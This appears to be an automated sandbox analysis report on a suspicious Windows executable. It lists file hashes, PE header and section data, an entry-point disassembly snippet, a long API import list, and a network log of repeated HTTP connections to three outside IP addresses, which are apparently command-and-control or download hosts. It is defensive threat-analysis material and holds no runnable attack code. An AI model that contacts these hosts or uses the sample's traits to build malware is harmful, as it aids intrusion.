                                              SSDEEP:6144:mQU9CwCX0rbFKR9fApwkpJRsU3XJ6qw9X9bdjEW2ksz:mQmn/UR9Wbpvh3XJ/w6ssz
                                              MD5:4542E9AAE94A1B5CE9E26E1F0252BB3E
                                              SHA1:66D46FBA6DF7AD0ADBB52D4BD6B567F53AABEC54
                                              SHA-256:048F4E444F3D4081A0E2EF2FDA1A12F76C3D94ACA0F2F96474C70501A53FFD22
                                              SHA-512:D88C4367133B5AE934AA974DAC37213A8E706BDA7935E56D40037EEA51AB80C2D6D4FF70B6BD806B506D21A1BFF32C3A90284254705EB808C1ED0A51720055D1
                                              Malicious:false
                                              Reputation:low
                                              Preview:..}..1ELM..F....8O..g@I...8OQ1ELMVEJOQHGK468LUWUOCABEZ8O.1ELCI.DO.A.j.7t.t.=&0a275_=0\e/,8+%;q*"kFCVl<9u...b(5\*.<HFiVEJOQHG25?.q50.r#&.x:_.K..w6".U..wTQ.V...s#&..3['lQ".MVEJOQHG.q68.TVU..C.EZ8OQ1EL.VGKDPCGK`28LUWUOCAB.N8OQ!ELM&AJOQ.GK$68LWWUICABEZ8OW1ELMVEJO!LGK668LUWUMC..EZ(OQ!ELMVUJOAHGK468\UWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJa%-??4688.SUOSABE.<OQ!ELMVEJOQHGK468lUW5OCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468
                                              Process:C:\Users\user\Desktop\psibx9rXra.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):288256
                                              Entropy (8bit):7.994941364645655
                                              Encrypted:true
                                              SSDEEP:6144:mQU9CwCX0rbFKR9fApwkpJRsU3XJ6qw9X9bdjEW2ksz:mQmn/UR9Wbpvh3XJ/w6ssz
                                              MD5:4542E9AAE94A1B5CE9E26E1F0252BB3E
                                              SHA1:66D46FBA6DF7AD0ADBB52D4BD6B567F53AABEC54
                                              SHA-256:048F4E444F3D4081A0E2EF2FDA1A12F76C3D94ACA0F2F96474C70501A53FFD22
                                              SHA-512:D88C4367133B5AE934AA974DAC37213A8E706BDA7935E56D40037EEA51AB80C2D6D4FF70B6BD806B506D21A1BFF32C3A90284254705EB808C1ED0A51720055D1
                                              Malicious:false
                                              Reputation:low
                                              Preview:..}..1ELM..F....8O..g@I...8OQ1ELMVEJOQHGK468LUWUOCABEZ8O.1ELCI.DO.A.j.7t.t.=&0a275_=0\e/,8+%;q*"kFCVl<9u...b(5\*.<HFiVEJOQHG25?.q50.r#&.x:_.K..w6".U..wTQ.V...s#&..3['lQ".MVEJOQHG.q68.TVU..C.EZ8OQ1EL.VGKDPCGK`28LUWUOCAB.N8OQ!ELM&AJOQ.GK$68LWWUICABEZ8OW1ELMVEJO!LGK668LUWUMC..EZ(OQ!ELMVUJOAHGK468\UWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJa%-??4688.SUOSABE.<OQ!ELMVEJOQHGK468lUW5OCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.921856383155438
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:psibx9rXra.exe
                                              File size:1'365'504 bytes
                                              MD5:df44b0a1b0208d51ee82419a7c9fdf47
                                              SHA1:401684aa7cec54ac1124b8fb92cc5bb510668608
                                              SHA256:29c036ae5258e869815a3be9b7ebdab701f69f575796555c52d9eb76c2735217
                                              SHA512:24710fbdc030db07cc13b7ea111ca8ec91c97780a4f3c0796d252f43f640141d5c3025f13e7df80006e0b22102169413965a671b84aaa38d58e3851667c94ec3
                                              SSDEEP:24576:Ru6J33O0c+JY5UZ+XC0kGso6FaZRlW206/SLs0eTVvWY:Du0c++OCvkGs9FaZW6aLcoY
                                              TLSH:6855AD2363DD8363CB669173BA6967016EBB7C230930F8571F843D7AA9701E1162D6B3
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                              Icon Hash:09329252ca8d344b
                                              Entrypoint:0x427dcd
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x675F6E2D [Mon Dec 16 00:02:53 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                              Instruction
                                              call 00007F8800CBC76Ah
                                              jmp 00007F8800CAF534h
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push edi
                                              push esi
                                              mov esi, dword ptr [esp+10h]
                                              mov ecx, dword ptr [esp+14h]
                                              mov edi, dword ptr [esp+0Ch]
                                              mov eax, ecx
                                              mov edx, ecx
                                              add eax, esi
                                              cmp edi, esi
                                              jbe 00007F8800CAF6BAh
                                              cmp edi, eax
                                              jc 00007F8800CAFA1Eh
                                              bt dword ptr [004C31FCh], 01h
                                              jnc 00007F8800CAF6B9h
                                              rep movsb
                                              jmp 00007F8800CAF9CCh
                                              cmp ecx, 00000080h
                                              jc 00007F8800CAF884h
                                              mov eax, edi
                                              xor eax, esi
                                              test eax, 0000000Fh
                                              jne 00007F8800CAF6C0h
                                              bt dword ptr [004BE324h], 01h
                                              jc 00007F8800CAFB90h
                                              bt dword ptr [004C31FCh], 00000000h
                                              jnc 00007F8800CAF85Dh
                                              test edi, 00000003h
                                              jne 00007F8800CAF86Eh
                                              test esi, 00000003h
                                              jne 00007F8800CAF84Dh
                                              bt edi, 02h
                                              jnc 00007F8800CAF6BFh
                                              mov eax, dword ptr [esi]
                                              sub ecx, 04h
                                              lea esi, dword ptr [esi+04h]
                                              mov dword ptr [edi], eax
                                              lea edi, dword ptr [edi+04h]
                                              bt edi, 03h
                                              jnc 00007F8800CAF6C3h
                                              movq xmm1, qword ptr [esi]
                                              sub ecx, 08h
                                              lea esi, dword ptr [esi+08h]
                                              movq qword ptr [edi], xmm1
                                              lea edi, dword ptr [edi+08h]
                                              test esi, 00000007h
                                              je 00007F8800CAF715h
                                              bt esi, 03h
                                              jnc 00007F8800CAF768h
                                              Programming Language:
                                              • [ASM] VS2013 build 21005
                                              • [ C ] VS2013 build 21005
                                              • [C++] VS2013 build 21005
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2013 UPD4 build 31101
                                              • [RES] VS2013 build 21005
                                              • [LNK] VS2013 UPD4 build 31101
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x84c70.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x14c0000x711c.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0xc70000x84c700x84e00a5b367e599e7a2884d45aa92de595777False0.6528416774459078data6.721001196125339IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x14c0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                              RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                              RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                              RT_ICON0xc77d00x2d208Device independent bitmap graphic, 213 x 420 x 32, image size 178920, resolution 5669 x 5669 px/mEnglishGreat Britain0.019297771045228305
                                              RT_MENU0xf49d80x50dataEnglishGreat Britain0.9
                                              RT_STRING0xf4a280x594dataEnglishGreat Britain0.3333333333333333
                                              RT_STRING0xf4fbc0x68adataEnglishGreat Britain0.2747909199522103
                                              RT_STRING0xf56480x490dataEnglishGreat Britain0.3715753424657534
                                              RT_STRING0xf5ad80x5fcdataEnglishGreat Britain0.3087467362924282
                                              RT_STRING0xf60d40x65cdataEnglishGreat Britain0.34336609336609336
                                              RT_STRING0xf67300x466dataEnglishGreat Britain0.3605683836589698
                                              RT_STRING0xf6b980x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                              RT_RCDATA0xf6cf00x54a63data1.00033456101845
                                              RT_GROUP_ICON0x14b7540x14dataEnglishGreat Britain1.25
                                              RT_GROUP_ICON0x14b7680x14dataEnglishGreat Britain1.25
                                              RT_GROUP_ICON0x14b77c0x14dataEnglishGreat Britain1.15
                                              RT_GROUP_ICON0x14b7900x14dataEnglishGreat Britain1.25
                                              RT_VERSION0x14b7a40xdcdataEnglishGreat Britain0.6181818181818182
                                              RT_MANIFEST0x14b8800x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                              DLLImport
                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                              PSAPI.DLLGetProcessMemoryInfo
                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                              UxTheme.dllIsThemeActive
                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishGreat Britain
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 10, 2025 20:09:39.729722023 CET4996980192.168.2.623.227.38.74
                                              Jan 10, 2025 20:09:39.734637976 CET804996923.227.38.74192.168.2.6
                                              Jan 10, 2025 20:09:39.735884905 CET4996980192.168.2.623.227.38.74
                                              Jan 10, 2025 20:09:39.744076014 CET4996980192.168.2.623.227.38.74
                                              Jan 10, 2025 20:09:39.748837948 CET804996923.227.38.74192.168.2.6
                                              Jan 10, 2025 20:09:40.292552948 CET804996923.227.38.74192.168.2.6
                                              Jan 10, 2025 20:09:40.292572975 CET804996923.227.38.74192.168.2.6
                                              Jan 10, 2025 20:09:40.292830944 CET4996980192.168.2.623.227.38.74
                                              Jan 10, 2025 20:09:40.293540001 CET804996923.227.38.74192.168.2.6
                                              Jan 10, 2025 20:09:40.294962883 CET4996980192.168.2.623.227.38.74
                                              Jan 10, 2025 20:09:40.296312094 CET4996980192.168.2.623.227.38.74
                                              Jan 10, 2025 20:09:40.301608086 CET804996923.227.38.74192.168.2.6
                                              Jan 10, 2025 20:09:55.710099936 CET4998480192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:09:55.714998007 CET8049984154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:09:55.715085983 CET4998480192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:09:55.727380991 CET4998480192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:09:55.732484102 CET8049984154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:09:56.612174988 CET8049984154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:09:56.612296104 CET8049984154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:09:56.612401962 CET4998480192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:09:57.232707977 CET4998480192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:09:58.250221014 CET4998580192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:09:58.255117893 CET8049985154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:09:58.255269051 CET4998580192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:09:58.266921997 CET4998580192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:09:58.271759033 CET8049985154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:09:59.178783894 CET8049985154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:09:59.178831100 CET8049985154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:09:59.178958893 CET4998580192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:09:59.778371096 CET4998580192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:00.797265053 CET4998680192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:00.802198887 CET8049986154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:00.802337885 CET4998680192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:00.814007044 CET4998680192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:00.818839073 CET8049986154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:00.818950891 CET8049986154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:01.790316105 CET8049986154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:01.790472984 CET8049986154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:01.790524006 CET4998680192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:02.326837063 CET4998680192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:03.343925953 CET4998780192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:03.348850012 CET8049987154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:03.350382090 CET4998780192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:03.358057976 CET4998780192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:03.362807989 CET8049987154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:04.434075117 CET8049987154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:04.434098959 CET8049987154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:04.434676886 CET4998780192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:04.443754911 CET4998780192.168.2.6154.23.178.183
                                              Jan 10, 2025 20:10:04.448597908 CET8049987154.23.178.183192.168.2.6
                                              Jan 10, 2025 20:10:09.468982935 CET4998880192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:09.474117994 CET804998845.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:09.474267006 CET4998880192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:09.485786915 CET4998880192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:09.490689993 CET804998845.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:10.167418003 CET804998845.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:10.167706013 CET804998845.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:10.167769909 CET4998880192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:10.997209072 CET4998880192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:12.015880108 CET4998980192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:12.020653009 CET804998945.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:12.020817995 CET4998980192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:12.032351017 CET4998980192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:12.037564039 CET804998945.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:12.732523918 CET804998945.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:12.732876062 CET804998945.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:12.733011961 CET4998980192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:13.559334993 CET4998980192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:14.563488960 CET4999080192.168.2.645.158.77.253
